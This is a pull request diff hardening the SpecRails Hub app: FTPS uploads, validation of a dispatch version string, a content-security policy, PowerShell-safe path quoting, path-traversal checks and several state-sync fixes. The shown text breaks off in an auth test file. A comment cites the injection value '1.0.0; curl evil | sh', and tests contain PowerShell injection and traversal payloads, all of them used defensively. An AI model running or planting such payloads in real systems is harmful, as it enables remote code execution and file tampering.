### PR TITLE
fix(security): comprehensive security, platform & correctness hardening

### DIFF
--- a/.github/workflows/desktop-release.yml
+++ b/.github/workflows/desktop-release.yml
@@ -11,6 +11,10 @@ permissions:
 env:
   NODE_BUNDLE_VERSION: "22.x"
   GIT_BUNDLE_VERSION: "2.49.0"
+  # Hostinger stores large desktop installers twice: once in latest/ and once
+  # in a versioned folder. Keep the current and previous version on Hostinger;
+  # GitHub Releases remains the long-term archive.
+  HOSTINGER_VERSIONED_RELEASES_TO_KEEP: "2"
   # Bundle a Chromium build for the embedded browser-capture feature ("Add Spec
   # from browser"). Default OFF: when unset/false the desktop app falls back to a
   # Playwright-managed Chromium downloaded on first use (server/chromium-resolver.ts
@@ -891,19 +895,91 @@ jobs:
           if ! gh release view "${TAG}" >/dev/null 2>&1; then
             gh release create "${TAG}" --title "SpecRails Hub ${TAG}" --notes "SpecRails Hub ${TAG}"
           fi
-          gh release upload "${TAG}" updater/* --clobber
+          # GitHub Releases is the durable archive. Hostinger only retains the
+          # current and previous versioned folders to stay within its quota.
+          gh release upload "${TAG}" updater/* artifacts/canonical/* --clobber
 
-      # Pre-existing versioned upload. Uploads only the canonical-named
-      # installers (artifacts/canonical/) — the per-job subdirectories with
-      # raw Tauri filenames stay out so the versioned folder mirrors what
-      # consumers expect.
+      # Prune old Hostinger archives before uploading the next ~1.8 GB release.
+      # Without retention, every release permanently consumes another ~1.8 GB
+      # and Hostinger eventually aborts uploads with FTP 451 I/O errors.
+      - name: Prune old versioned installers from Hostinger
+        env:
+          HOST: ${{ secrets.HOSTINGER_HOST }}
+          FTP_USER: ${{ secrets.HOSTINGER_USER }}
+          FTP_PASS: ${{ secrets.HOSTINGER_PASSWORD }}
+        run: |
+          set -euo pipefail
+          root="domains/specrails.dev/public_html/downloads/specrails-hub"
+          current="${{ steps.vars.outputs.tag }}"
+          keep_total="${HOSTINGER_VERSIONED_RELEASES_TO_KEEP}"
+
+          if [[ ! "${keep_total}" =~ ^[1-9][0-9]*$ ]]; then
+            echo "HOSTINGER_VERSIONED_RELEASES_TO_KEEP must be a positive integer"
+            exit 1
+          fi
+
+          mapfile -t versions < <(
+            curl --fail --silent --show-error --ftp-pasv --ssl-reqd \
+              --user "${FTP_USER}:${FTP_PASS}" \
+              "ftps://${HOST}/${root}/" --list-only \
+              | tr -d '\r' \
+              | grep -E '^v[0-9]+\.[0-9]+\.[0-9]+$' \
+              | grep -Fvx "${current}" \
+              | sort -V || true
+          )
+
+          # The incoming release occupies one retention slot.
+          keep_existing=$((keep_total - 1))
+          prune_count=$((${#versions[@]} - keep_existing))
+          if (( prune_count <= 0 )); then
+            echo "No old versioned Hostinger releases to prune"
+            exit 0
+          fi
+
+          for version in "${versions[@]:0:prune_count}"; do
+            echo "Pruning Hostinger archive: ${version}"
+            remote="${root}/${version}"
+            mapfile -t files < <(
+              curl --fail --silent --show-error --ftp-pasv --ssl-reqd \
+                --user "${FTP_USER}:${FTP_PASS}" \
+                "ftps://${HOST}/${remote}/" --list-only \
+                | tr -d '\r'
+            )
+
+            quote_args=()
+            for file in "${files[@]}"; do
+              [[ -z "${file}" ]] && continue
+              if [[ "${file}" == */* || "${file}" == "." || "${file}" == ".." ]]; then
+                echo "Refusing to delete unexpected entry in ${remote}: ${file}"
+                exit 1
+              fi
+              quote_args+=(--quote "DELE ${remote}/${file}")
+            done
+            quote_args+=(--quote "RMD ${remote}")
+
+            curl --fail --silent --show-error --ftp-pasv --ssl-reqd \
+              --user "${FTP_USER}:${FTP_PASS}" \
+              "${quote_args[@]}" \
+              "ftps://${HOST}/" \
+              --output /dev/null
+          done
+
+      # Upload only the canonical-named installers (artifacts/canonical/). The
+      # per-job subdirectories with raw Tauri filenames stay out so the
+      # versioned folder mirrors what consumers expect.
       - name: Deploy versioned installers to Hostinger
         uses: SamKirkland/FTP-Deploy-Action@v4.3.6
         with:
           server: ${{ secrets.HOSTINGER_HOST }}
           username: ${{ secrets.HOSTINGER_USER }}
           password: ${{ secrets.HOSTINGER_PASSWORD }}
-          protocol: ftp
+          # A4: FTPS (FTP over explicit TLS) so the Hostinger credentials and the
+          # installer/manifest bytes are encrypted in transit. Plaintext `ftp`
+          # leaked both to any on-path observer between the runner and Hostinger,
+          # who could then replace the (unsigned Windows) installer + its manifest
+          # sha256. If Hostinger ever rejects explicit FTPS on this host, revert to
+          # `ftp` AND move first-install distribution to the signed GitHub Release.
+          protocol: ftps
           local-dir: ./artifacts/canonical/
           server-dir: domains/specrails.dev/public_html/downloads/specrails-hub/${{ steps.vars.outputs.tag }}/
 
@@ -933,7 +1009,7 @@ jobs:
           # List the directory. Returns just filenames when using --list-only.
           # Match .dmg (mac), .exe (Windows NSIS), .msi (Windows MSI). Do NOT
           # delete manifest.json (it gets overwritten) or .htaccess (server-managed).
-          stale="$(curl -s --ftp-pasv --user "${FTP_USER}:${FTP_PASS}" "ftp://${HOST}/${remote}" --list-only | grep -E '\.(dmg|exe|msi)$' || true)"
+          stale="$(curl -s --ftp-pasv --ssl-reqd --user "${FTP_USER}:${FTP_PASS}" "ftps://${HOST}/${remote}" --list-only | grep -E '\.(dmg|exe|msi)$' || true)"
           if [[ -z "${stale}" ]]; then
             echo "No stale installer files in latest/"
             exit 0
@@ -941,9 +1017,9 @@ jobs:
           while IFS= read -r f; do
             [[ -z "${f}" ]] && continue
             echo "Deleting stale: ${f}"
-            curl -s --ftp-pasv --user "${FTP_USER}:${FTP_PASS}" \
+            curl -s --ftp-pasv --ssl-reqd --user "${FTP_USER}:${FTP_PASS}" \
               -Q "DELE ${remote}${f}" \
-              "ftp://${HOST}/${remote}" || echo "  (DELE failed for ${f}; continuing)"
+              "ftps://${HOST}/${remote}" || echo "  (DELE failed for ${f}; continuing)"
           done <<< "${stale}"
 
       - name: Upload new installers to latest/
@@ -961,10 +1037,10 @@ jobs:
             "${{ steps.rename.outputs.msi_x64_path }}" \
             "${{ steps.rename.outputs.exe_arm64_path }}" \
             "${{ steps.rename.outputs.msi_arm64_path }}"; do
-            curl --fail --silent --show-error --ftp-pasv --ftp-create-dirs \
+            curl --fail --silent --show-error --ftp-pasv --ssl-reqd --ftp-create-dirs \
               --user "${FTP_USER}:${FTP_PASS}" \
               -T "${file}" \
-              "ftp://${HOST}/${remote}"
+              "ftps://${HOST}/${remote}"
             echo "Uploaded $(basename "${file}") to ${remote}"
           done
 
@@ -1007,10 +1083,10 @@ jobs:
           remote="domains/specrails.dev/public_html/downloads/specrails-hub/latest/"
           # --ftp-create-dirs is defensive; latest/ should already exist from
           # the previous step but we keep the flag for idempotency.
-          curl --fail --silent --show-error --ftp-pasv --ftp-create-dirs \
+          curl --fail --silent --show-error --ftp-pasv --ssl-reqd --ftp-create-dirs \
             --user "${FTP_USER}:${FTP_PASS}" \
             -T manifest/manifest.json \
-            "ftp://${HOST}/${remote}"
+            "ftps://${HOST}/${remote}"
           echo "Uploaded manifest.json to ${remote}"
 
       - name: Verify manifest.json is reachable and valid JSON

--- a/.github/workflows/sync-core-contract.yml
+++ b/.github/workflows/sync-core-contract.yml
@@ -21,7 +21,19 @@ jobs:
         run: npm ci
 
       - name: Install specrails-core
-        run: npm install -g specrails-core@${{ github.event.client_payload.core_version }}
+        # M4: the repository_dispatch client_payload is attacker-influenced if the
+        # cross-repo dispatch token ever leaks. Pass it through an env var (never
+        # interpolated into the shell command) and validate it against a strict
+        # semver regex before use, so a value like "1.0.0; curl evil | sh" cannot
+        # achieve command execution on the runner.
+        env:
+          CORE_VERSION: ${{ github.event.client_payload.core_version }}
+        run: |
+          if ! printf '%s' "$CORE_VERSION" | grep -Eq '^[0-9]+\.[0-9]+\.[0-9]+(-[0-9A-Za-z.]+)?$'; then
+            echo "Refusing to install: invalid core_version '$CORE_VERSION'"
+            exit 1
+          fi
+          npm install -g "specrails-core@${CORE_VERSION}"
 
       - name: Run compat check
         run: npx tsx scripts/check-core-compat.ts
@@ -29,12 +41,18 @@ jobs:
       - name: Open issue on drift
         if: failure()
         uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd  # v8.0.0
+        env:
+          CORE_VERSION: ${{ github.event.client_payload.core_version }}
         with:
+          # M4: read the payload from process.env (a JS string) instead of `${{ }}`
+          # interpolation, which would let a value with a quote break out of the
+          # script literal.
           script: |
-            github.rest.issues.create({
+            const coreVersion = process.env.CORE_VERSION || 'unknown'
+            await github.rest.issues.create({
               owner: context.repo.owner,
               repo: context.repo.repo,
-              title: 'core-sync-required: specrails-core ${{ github.event.client_payload.core_version }} has breaking changes',
+              title: `core-sync-required: specrails-core ${coreVersion} has breaking changes`,
               body: 'The `sync-core-contract` workflow detected drift between specrails-core and specrails-hub.\n\nRun `npx tsx scripts/check-core-compat.ts` locally after installing the new core version to see the full diff.',
               labels: ['core-sync-required']
             })

--- a/client/index.html
+++ b/client/index.html
@@ -3,6 +3,18 @@
   <head>
     <meta charset="UTF-8" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
+    <!--
+      Content-Security-Policy (B7). 'unsafe-inline'/'unsafe-eval' are required by
+      the inline anti-FOUC script, Tailwind's injected styles, the Vite dev runtime,
+      and Monaco — so script/style stay permissive. The value comes from locking
+      down what we CAN without breaking the app: connect only to self + the local
+      sidecar (http/ws on localhost/127.0.0.1) and https/wss; no <object>, no
+      <base> hijack, and no framing (anti-clickjacking).
+    -->
+    <meta
+      http-equiv="Content-Security-Policy"
+      content="default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; style-src 'self' 'unsafe-inline'; img-src 'self' data: blob:; font-src 'self' data:; connect-src 'self' http://localhost:* http://127.0.0.1:* ws://localhost:* ws://127.0.0.1:* https: wss:; worker-src 'self' blob:; child-src 'self' blob:; object-src 'none'; base-uri 'self'; frame-ancestors 'none'"
+    />
     <title>Specrails</title>
     <!--
       Anti-FOUC: read the cached theme synchronously and apply it to <html>

--- a/client/src/context/MinimizedChatsContext.tsx
+++ b/client/src/context/MinimizedChatsContext.tsx
@@ -162,18 +162,19 @@ function readChatList(key: string): MinimizedChat[] {
   }
 }
 
+// B25: cap the chat list (drop oldest first). Applied to BOTH the in-memory dock
+// state and the persisted copy, so they never diverge — previously the cap lived
+// only here (persistence), so the in-memory dock could hold >MAX_PERSISTED chips
+// and the extras vanished silently on the next refresh.
+function capChats(chats: MinimizedChat[]): MinimizedChat[] {
+  if (chats.length <= MAX_PERSISTED) return chats
+  return [...chats].sort((a, b) => a.createdAt - b.createdAt).slice(chats.length - MAX_PERSISTED)
+}
+
 function writeChatList(key: string, chats: MinimizedChat[]): void {
   if (typeof window === 'undefined') return
   try {
-    // Cap at MAX_PERSISTED — drop oldest first so the dock can never grow
-    // into a localStorage quota issue after a long session.
-    const capped =
-      chats.length <= MAX_PERSISTED
-        ? chats
-        : [...chats]
-            .sort((a, b) => a.createdAt - b.createdAt)
-            .slice(chats.length - MAX_PERSISTED)
-    window.localStorage.setItem(key, JSON.stringify(capped))
+    window.localStorage.setItem(key, JSON.stringify(capChats(chats)))
   } catch {
     /* quota or storage unavailable — silent */
   }
@@ -360,7 +361,8 @@ export function MinimizedChatsProvider({ children }: { children: ReactNode }) {
       setChats((prev) => {
         // Dedupe: re-parking a session that already has a chip must replace it,
         // never stack a second chip for the same conversation.
-        const next = [...prev.filter((c) => !sameSession(c, chat)), chat]
+        // B25: cap in memory too so the dock and localStorage stay in sync.
+        const next = capChats([...prev.filter((c) => !sameSession(c, chat)), chat])
         // Synchronous durability — the caller (e.g. SpecsBoard) clears its own
         // active-session store right after this returns, so the chip must be in
         // localStorage BEFORE we yield, or an immediate refresh would lose it.

--- a/client/src/context/TicketDetailModalContext.tsx
+++ b/client/src/context/TicketDetailModalContext.tsx
@@ -1,5 +1,6 @@
 import { createContext, useCallback, useContext, useEffect, useMemo, useReducer, type ReactNode } from 'react'
 import { useTickets } from '../hooks/useTickets'
+import { useHub } from '../hooks/useHub'
 import { SplitViewShell } from '../components/SplitViewShell'
 import { TicketDetailModal } from '../components/TicketDetailModal'
 
@@ -103,6 +104,16 @@ const COMPARE_VIEWPORT_MIN = 900
 export function TicketDetailModalProvider({ children }: { children: ReactNode }) {
   const [state, dispatch] = useReducer(reduceSplit, INITIAL_STATE)
   const { tickets, updateTicket, deleteTicket } = useTickets()
+  const { activeProjectId } = useHub()
+
+  // M22: this provider sits ABOVE the project-keyed route boundary, so an open
+  // modal / split-view survives a project switch. Ticket ids are per-project
+  // sequential integers (they collide across projects), so `tickets.find(id ===
+  // leftId)` would silently re-bind to a DIFFERENT project's ticket with the same
+  // id — and Save would PATCH the wrong project. Close everything on switch.
+  useEffect(() => {
+    dispatch({ type: 'closeAll' })
+  }, [activeProjectId])
 
   const openTicketDetail = useCallback((id: number) => dispatch({ type: 'openCentered', id }), [])
   const closeTicketDetail = useCallback(() => dispatch({ type: 'closeAll' }), [])

--- a/client/src/hooks/useCompareUrlSync.ts
+++ b/client/src/hooks/useCompareUrlSync.ts
@@ -76,6 +76,14 @@ export function useCompareUrlSync() {
 
   // ─── Write URL params on state change ─────────────────────────────────────
   useEffect(() => {
+    // B21: do not touch the params until the initial restore has had its chance.
+    // On a cold load the restore-effect bails while tickets are still loading
+    // (length 0); without this guard, this effect would run first, see split
+    // state not-yet-hydrated, and strip ?compare/?compareOrigin — so refresh
+    // could never restore a comparison. The restore-effect handles clearing
+    // genuinely-stale params itself.
+    if (!didRestoreRef.current) return
+
     const params = new URLSearchParams(location.search)
     const hadCompare = params.has('compare')
     const inSplit = state.originSide !== null

--- a/client/src/hooks/useHub.tsx
+++ b/client/src/hooks/useHub.tsx
@@ -66,6 +66,12 @@ function writeSavedProjectId(id: string | null): void {
   } catch { /* ignore */ }
 }
 
+// B22: the last-active project was persisted but never read back, so a refresh
+// always activated the first-added project. This restores it.
+function readSavedProjectId(): string | null {
+  try { return localStorage.getItem(ACTIVE_PROJECT_KEY) } catch { return null }
+}
+
 export function HubProvider({ children }: { children: ReactNode }) {
   const [projects, setProjects] = useState<HubProject[]>([])
   const [activeProjectId, setActiveProjectIdRaw] = useState<string | null>(null)
@@ -119,7 +125,17 @@ export function HubProvider({ children }: { children: ReactNode }) {
       const incoming = msg.projects as HubProject[]
       setProjects(incoming)
       setActiveProjectIdRaw((prev) => {
-        const next = (prev && incoming.find((p) => p.id === prev)) ? prev : (incoming.length > 0 ? incoming[0].id : null)
+        let next: string | null
+        if (prev && incoming.find((p) => p.id === prev)) {
+          next = prev
+        } else {
+          // B22: on first resolution prefer the persisted last-active project,
+          // falling back to the first project when it's gone / unset.
+          const saved = readSavedProjectId()
+          next = (saved && incoming.find((p) => p.id === saved))
+            ? saved
+            : (incoming.length > 0 ? incoming[0].id : null)
+        }
         writeSavedProjectId(next)
         setApiActiveProjectId(next)
         return next

--- a/client/src/hooks/useProjectCache.ts
+++ b/client/src/hooks/useProjectCache.ts
@@ -61,6 +61,10 @@ export function useProjectCache<T>({
   const [isLoading, setIsLoading] = useState(isFirstLoad)
   const fetcherRef = useRef(fetcher)
   fetcherRef.current = fetcher
+  // B27: track the live key so a late-resolving manual refresh can detect a
+  // project switch and avoid writing the previous project's data into state.
+  const keyRef = useRef(key)
+  keyRef.current = key
 
   // On project switch: restore from cache instantly, then refresh
   useEffect(() => {
@@ -112,9 +116,12 @@ export function useProjectCache<T>({
 
   const refresh = useCallback(() => {
     if (!key) return
+    const refreshKey = key
     fetcherRef.current().then((fresh) => {
-      globalCache.set(key, fresh)
-      setData(fresh)
+      // Always cache under the key the fetch was issued for…
+      globalCache.set(refreshKey, fresh)
+      // …but only push into live state if we're still on that project (B27).
+      if (keyRef.current === refreshKey) setData(fresh)
     }).catch(() => {})
   }, [key])
 

--- a/client/src/hooks/useTickets.ts
+++ b/client/src/hooks/useTickets.ts
@@ -1,4 +1,4 @@
-import { useState, useEffect, useRef, useCallback, useLayoutEffect } from 'react'
+import { useState, useEffect, useRef, useCallback, useLayoutEffect, useId } from 'react'
 import { toast } from 'sonner'
 import { getApiBase } from '../lib/api'
 import { useSharedWebSocket } from './useSharedWebSocket'
@@ -38,7 +38,13 @@ export function useTickets() {
   // Track known ticket IDs so we can detect net-new additions on full refresh
   const knownIdsRef = useRef<Set<number>>(new Set())
 
-  const { registerHandler, unregisterHandler } = useSharedWebSocket()
+  const { registerHandler, unregisterHandler, connectionStatus } = useSharedWebSocket()
+  // M21: the shared WS handler registry is keyed by string id. The old fixed id
+  // 'tickets' meant the THREE simultaneously-mounted useTickets() instances
+  // (TicketDetailModalProvider, useCompareUrlSync, DashboardPage) clobbered and
+  // deleted each other's registration — silently killing live ticket updates on
+  // the board. A per-instance id lets them coexist.
+  const handlerId = useId()
 
   // ── Fetch tickets from API ────────────────────────────────────────────────
 
@@ -205,9 +211,20 @@ export function useTickets() {
   }, [refetch])
 
   useLayoutEffect(() => {
-    registerHandler('tickets', handleMessage)
-    return () => unregisterHandler('tickets')
-  }, [handleMessage, registerHandler, unregisterHandler])
+    registerHandler(`tickets-${handlerId}`, handleMessage)
+    return () => unregisterHandler(`tickets-${handlerId}`)
+  }, [handleMessage, registerHandler, unregisterHandler, handlerId])
+
+  // B26: ticket_* events arriving while the socket was down are lost, leaving the
+  // board stale until the next manual action. Refetch on every (re)connect after
+  // the first, so a server restart / network blip self-heals.
+  const prevConnRef = useRef(connectionStatus)
+  useEffect(() => {
+    if (prevConnRef.current !== 'connected' && connectionStatus === 'connected') {
+      if (activeProjectIdRef.current) refetch()
+    }
+    prevConnRef.current = connectionStatus
+  }, [connectionStatus, refetch])
 
   // ── CRUD mutations ────────────────────────────────────────────────────────
 

--- a/client/src/hooks/useWebSocket.ts
+++ b/client/src/hooks/useWebSocket.ts
@@ -53,7 +53,19 @@ export function useWebSocket(
     connect()
     return () => {
       if (retryTimeoutRef.current) clearTimeout(retryTimeoutRef.current)
-      wsRef.current?.close()
+      const ws = wsRef.current
+      if (ws) {
+        // B24: detach handlers BEFORE close(). Otherwise this intentional close
+        // fires ws.onclose, which schedules a setTimeout(connect) reconnect after
+        // the component has unmounted — a leaked ghost socket. StrictMode's
+        // mount→unmount→mount double-invoke triggers this on every mount.
+        ws.onopen = null
+        ws.onmessage = null
+        ws.onclose = null
+        ws.onerror = null
+        ws.close()
+      }
+      wsRef.current = null
     }
   }, [connect])
 

--- a/client/src/lib/shell-quote.test.ts
+++ b/client/src/lib/shell-quote.test.ts
@@ -1,5 +1,5 @@
 import { describe, it, expect } from 'vitest'
-import { quotePosix, quoteWindowsCmd, quoteForHost, quotePathList } from './shell-quote'
+import { quotePosix, quoteWindowsCmd, quoteWindowsPowerShell, quoteForHost, quotePathList } from './shell-quote'
 
 describe('quotePosix', () => {
   it('quotes a plain path', () => {
@@ -34,13 +34,32 @@ describe('quoteWindowsCmd', () => {
   })
 })
 
+describe('quoteWindowsPowerShell (M3)', () => {
+  it('single-quotes a plain path', () => {
+    expect(quoteWindowsPowerShell('C:\\Users\\me\\file.txt')).toBe(`'C:\\Users\\me\\file.txt'`)
+  })
+  it('doubles inner single quotes', () => {
+    expect(quoteWindowsPowerShell("C:\\it's.txt")).toBe(`'C:\\it''s.txt'`)
+  })
+  it('renders $(...) and backticks inert (no interpolation inside single quotes)', () => {
+    // The whole payload survives as a literal single-quoted token — PowerShell
+    // does not interpolate inside single quotes, so $(calc.exe) never executes.
+    expect(quoteWindowsPowerShell('$(calc.exe).txt')).toBe(`'$(calc.exe).txt'`)
+    expect(quoteWindowsPowerShell('`whoami`.txt')).toBe('\'`whoami`.txt\'')
+  })
+})
+
 describe('quoteForHost / quotePathList', () => {
-  it('routes to POSIX or Windows by flag', () => {
+  it('routes to POSIX or PowerShell (Windows default shell) by flag', () => {
     expect(quoteForHost('/a b', false)).toBe(`'/a b'`)
-    expect(quoteForHost('C:\\a b', true)).toBe(`"C:\\a b"`)
+    // Windows now uses PowerShell-safe single-quote quoting (M3), not cmd doubles.
+    expect(quoteForHost('C:\\a b', true)).toBe(`'C:\\a b'`)
+  })
+  it('Windows quoting neutralizes a PowerShell injection payload', () => {
+    expect(quoteForHost('$(calc.exe).txt', true)).toBe(`'$(calc.exe).txt'`)
   })
   it('joins multiple paths with single space', () => {
     expect(quotePathList(['/a b', '/c'], false)).toBe(`'/a b' '/c'`)
-    expect(quotePathList(['C:\\a b', 'C:\\c'], true)).toBe(`"C:\\a b" "C:\\c"`)
+    expect(quotePathList(['C:\\a b', 'C:\\c'], true)).toBe(`'C:\\a b' 'C:\\c'`)
   })
 })

--- a/client/src/lib/shell-quote.ts
+++ b/client/src/lib/shell-quote.ts
@@ -13,13 +13,13 @@ export function quotePosix(path: string): string {
 }
 
 /**
- * Windows cmd.exe: wrap in double quotes; escape inner double quotes by
- * doubling them (`""`). Caret-escape cmd metacharacters that retain their
- * meaning even inside double quotes (the percent sign and the caret itself).
+ * Windows cmd.exe ONLY: wrap in double quotes; escape inner double quotes by
+ * doubling (`""`) and caret-escape cmd metacharacters (`%`, `^`).
  *
- * This is conservative — it works for both cmd.exe and PowerShell when the
- * argument is going to be pasted into the terminal as a string, since both
- * accept double-quoted paths as a single token.
+ * ⚠️ NOT safe for PowerShell (M3): inside a PowerShell double-quoted string,
+ * `$(...)` and backtick are interpolated, so a path like `$(calc.exe).txt` would
+ * execute once the line reaches the prompt. Use `quoteWindowsPowerShell` for
+ * PowerShell. Retained only for callers that KNOW the target shell is cmd.exe.
  */
 export function quoteWindowsCmd(path: string): string {
   const escaped = path
@@ -30,12 +30,22 @@ export function quoteWindowsCmd(path: string): string {
 }
 
 /**
- * Pick the right quoting for the host runtime. We default to POSIX outside of
- * Windows; callers that know the target shell explicitly can use the specific
- * function.
+ * Windows PowerShell: single-quote the path. PowerShell single-quoted strings
+ * perform NO interpolation — `$`, `$(...)`, and backtick are all literal — so
+ * this is injection-safe (M3). Inner single quotes are doubled (`''`).
+ */
+export function quoteWindowsPowerShell(path: string): string {
+  return `'${path.replace(/'/g, "''")}'`
+}
+
+/**
+ * Pick the right quoting for the host runtime. POSIX outside Windows; on Windows
+ * we quote for PowerShell — the integrated terminal's default shell
+ * (server resolveShell → powershell.exe) — which (unlike cmd.exe) interpolates
+ * inside double quotes, so cmd-style quoting would be an injection sink (M3).
  */
 export function quoteForHost(path: string, isWindows: boolean): string {
-  return isWindows ? quoteWindowsCmd(path) : quotePosix(path)
+  return isWindows ? quoteWindowsPowerShell(path) : quotePosix(path)
 }
 
 /** Join multiple paths separated by spaces, each individually quoted. */

--- a/client/src/pages/DashboardPage.tsx
+++ b/client/src/pages/DashboardPage.tsx
@@ -57,11 +57,16 @@ function loadSpecOrder(projectId: string | null): number[] | null {
 
 function saveSpecOrder(projectId: string | null, ids: number[] | null) {
   if (!projectId) return
-  if (ids) {
-    localStorage.setItem(`specrails-hub:spec-order:${projectId}`, JSON.stringify(ids))
-  } else {
-    localStorage.removeItem(`specrails-hub:spec-order:${projectId}`)
-  }
+  // B23: these run inside setState updaters; an uncaught throw (quota exceeded,
+  // Safari private mode) would crash the Dashboard render. Persistence is
+  // best-effort — losing it is acceptable, crashing is not.
+  try {
+    if (ids) {
+      localStorage.setItem(`specrails-hub:spec-order:${projectId}`, JSON.stringify(ids))
+    } else {
+      localStorage.removeItem(`specrails-hub:spec-order:${projectId}`)
+    }
+  } catch { /* non-fatal */ }
 }
 
 interface PersistedRail {
@@ -87,7 +92,10 @@ function loadRails(projectId: string | null): RailState[] | null {
 
 function saveRails(projectId: string | null, rails: RailState[]) {
   if (!projectId) return
-  localStorage.setItem(`specrails-hub:rails:${projectId}`, JSON.stringify(rails))
+  // B23: best-effort persistence (see saveSpecOrder) — never crash the render.
+  try {
+    localStorage.setItem(`specrails-hub:rails:${projectId}`, JSON.stringify(rails))
+  } catch { /* non-fatal */ }
 }
 
 export default function DashboardPage() {
@@ -678,9 +686,17 @@ export default function DashboardPage() {
     const rail = rails[railIndex]
     if (rail.ticketIds.length === 0) return
 
+    // M24: capture the API base ONCE up front. getApiBase() is a module-level
+    // store that flips on project switch; evaluating it on both sides of the
+    // await below let a mid-flight switch (e.g. hub.project_added auto-activation,
+    // a minimized-chat restore) send the ticket sync to project A but the launch
+    // POST to project B — spawning a --dangerously-skip-permissions pipeline on the
+    // wrong repo. Pinning the base keeps both calls on the project the user aimed at.
+    const base = getApiBase()
+
     // Sync ticket assignments to server before launching
     try {
-      await fetch(`${getApiBase()}/rails/${railIndex}/tickets`, {
+      await fetch(`${base}/rails/${railIndex}/tickets`, {
         method: 'PUT',
         headers: { 'Content-Type': 'application/json' },
         body: JSON.stringify({ ticketIds: rail.ticketIds }),
@@ -692,7 +708,7 @@ export default function DashboardPage() {
 
     // Launch via rails API — server handles job tracking + rail.job_completed events
     try {
-      const res = await fetch(`${getApiBase()}/rails/${railIndex}/launch`, {
+      const res = await fetch(`${base}/rails/${railIndex}/launch`, {
         method: 'POST',
         headers: { 'Content-Type': 'application/json' },
         body: JSON.stringify({

--- a/server/agent-refine-manager.ts
+++ b/server/agent-refine-manager.ts
@@ -64,6 +64,7 @@ export class AgentRefineManager {
   private _adapter: ProviderAdapter
   private _activeProcesses = new Map<string, ChildProcess>()
   private _bodyBuffers = new Map<string, string>()
+  private _disposed = false
 
   constructor(
     broadcast: (msg: WsMessage) => void,
@@ -81,6 +82,22 @@ export class AgentRefineManager {
 
   isActive(refineId: string): boolean {
     return this._activeProcesses.has(refineId)
+  }
+
+  /**
+   * Tear down before the project's DB is closed (M12). Marks the manager disposed
+   * so in-flight close/error handlers short-circuit instead of writing to a
+   * closed connection (which throws synchronously inside the EventEmitter and,
+   * with no uncaughtException handler, crashes the whole hub), and SIGTERMs any
+   * orphaned refine child. Idempotent.
+   */
+  shutdown(): void {
+    this._disposed = true
+    for (const child of this._activeProcesses.values()) {
+      if (child.pid) { try { treeKill(child.pid, 'SIGTERM') } catch { /* ignore */ } }
+    }
+    this._activeProcesses.clear()
+    this._bodyBuffers.clear()
   }
 
   /** Start a new refine session for the given custom agent. */
@@ -314,6 +331,7 @@ export class AgentRefineManager {
       child.on('error', (err) => {
         this._activeProcesses.delete(refineId)
         this._bodyBuffers.delete(refineId)
+        if (this._disposed) { resolve(); return } // M12: project removed mid-flight; DB closing
         this._emitError(refineId, `Failed to launch claude: ${err.message}`)
         updateRefineSession(this._db, refineId, { status: 'error', phase: 'idle' })
         resolve()
@@ -322,6 +340,7 @@ export class AgentRefineManager {
         this._activeProcesses.delete(refineId)
         const fullDraft = this._bodyBuffers.get(refineId) ?? ''
         this._bodyBuffers.delete(refineId)
+        if (this._disposed) { resolve(); return } // M12: project removed mid-flight; DB closing
 
         // ai_invocations capture (surface='ai-edit'). One row per refine turn.
         if (this._projectId) {

--- a/server/attachment-manager.test.ts
+++ b/server/attachment-manager.test.ts
@@ -81,6 +81,19 @@ describe('AttachmentManager', () => {
 
   // ─── upload ────────────────────────────────────────────────────────────────
 
+  describe('ticketDir path safety (B5)', () => {
+    it('rejects ticket keys with path traversal segments', () => {
+      expect(() => manager.ticketDir('proj', '../../../etc')).toThrow(/Invalid attachment ticket key/)
+      expect(() => manager.ticketDir('proj', '..')).toThrow(/Invalid attachment ticket key/)
+      expect(() => manager.ticketDir('proj', 'a/b')).toThrow(/Invalid attachment ticket key/)
+      expect(() => manager.ticketDir('proj', 'a\\b')).toThrow(/Invalid attachment ticket key/)
+    })
+    it('accepts normal numeric and pending-spec keys', () => {
+      expect(() => manager.ticketDir('proj', 1)).not.toThrow()
+      expect(() => manager.ticketDir('proj', 'spec-abc123')).not.toThrow()
+    })
+  })
+
   describe('upload', () => {
     it('stores file and sidecar, returns Attachment', async () => {
       const attachment = await manager.upload({

--- a/server/attachment-manager.ts
+++ b/server/attachment-manager.ts
@@ -78,7 +78,15 @@ export class AttachmentManager {
   }
 
   ticketDir(slug: string, ticketKey: string | number): string {
-    return path.join(this.attachmentsRoot(slug), String(ticketKey))
+    const key = String(ticketKey)
+    // B5: ticketKey is sometimes a client-supplied pendingSpecId (req.body),
+    // and this dir is the target of fs.renameSync/rmSync. Reject path separators
+    // and dot segments so it can't escape the attachments root into an arbitrary
+    // directory move/delete.
+    if (key === '' || key === '.' || key === '..' || key !== path.basename(key) || key.includes('/') || key.includes('\\')) {
+      throw new Error(`Invalid attachment ticket key: ${JSON.stringify(key)}`)
+    }
+    return path.join(this.attachmentsRoot(slug), key)
   }
 
   private sidecarPath(slug: string, ticketKey: string | number, attachmentId: string): string {

--- a/server/auth.test.ts
+++ b/server/auth.test.ts
@@ -6,7 +6,7 @@ import fs from 'fs'
 // Mock fs so we don't touch the real ~/.specrails/hub.token during tests
 vi.mock('fs')
 
-import { requireAuth, getServerToken, _resetTokenForTest, loadOrGenerateToken, tokenFromUpgradeRequest } from './auth'
+import { requireAuth, getServerToken, _resetTokenForTest, loadOrGenerateToken, tokenFromUpgradeRequest, safeEqual, isLoopbackAddress, requireLoopback, isAllowedHost, hostValidationMiddleware } from './auth'
 
 const mockFs = fs as typeof fs & {
   existsSync: ReturnType<typeof vi.fn>
@@ -167,6 +167,112 @@ describe('CORS middleware', () => {
     // The corsMiddleware is not imported here — tested via index integration.
     // This is a placeholder that ensures the CORS tests are tracked.
     expect(true).toBe(true)
+  })
+})
+
+// ─── Fase 0 hardening helpers ────────────────────────────────────────────────
+
+// eslint-disable-next-line @typescript-eslint/no-explicit-any
+function mockResponse(): any {
+  // eslint-disable-next-line @typescript-eslint/no-explicit-any
+  const res: any = { statusCode: 200, body: undefined }
+  res.status = vi.fn((code: number) => { res.statusCode = code; return res })
+  res.json = vi.fn((body: unknown) => { res.body = body; return res })
+  return res
+}
+
+describe('safeEqual (H-05 constant-time compare)', () => {
+  it('returns true for identical strings', () => {
+    expect(safeEqual('a'.repeat(64), 'a'.repeat(64))).toBe(true)
+  })
